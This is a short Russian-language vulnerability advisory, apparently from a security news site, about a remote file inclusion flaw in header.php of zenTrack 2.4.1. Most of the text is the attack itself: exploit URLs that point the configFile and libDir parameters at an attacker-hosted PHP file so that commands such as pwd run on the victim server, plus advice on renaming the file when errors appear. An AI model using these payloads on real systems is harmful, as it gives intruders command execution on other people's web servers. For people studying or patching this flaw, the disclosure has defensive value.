Уязвимый продукт : zenTrack 2.4.1 (ранние?) и следующие
Сайт создателя : http://zendocs.phpzen.net/zentrack/

Уязвимость в header.php позволяет атакующим выполнять команды с правами вебсервера. Пример:

http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php? cmd=pwd

или

Создайте файл translator.class где-нибудь у себя на сервере, содержащий php код, который позволит вам исполнят ькоманды. К примеру, я создал файл translator.class в папке
test:

http://[victim]/zentrack/www/index.php?libDir=http:// [attacker]/test/&cmd=pwd

Если начинают вылезать ошибки копируйте translator.class в zenTrack.class.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии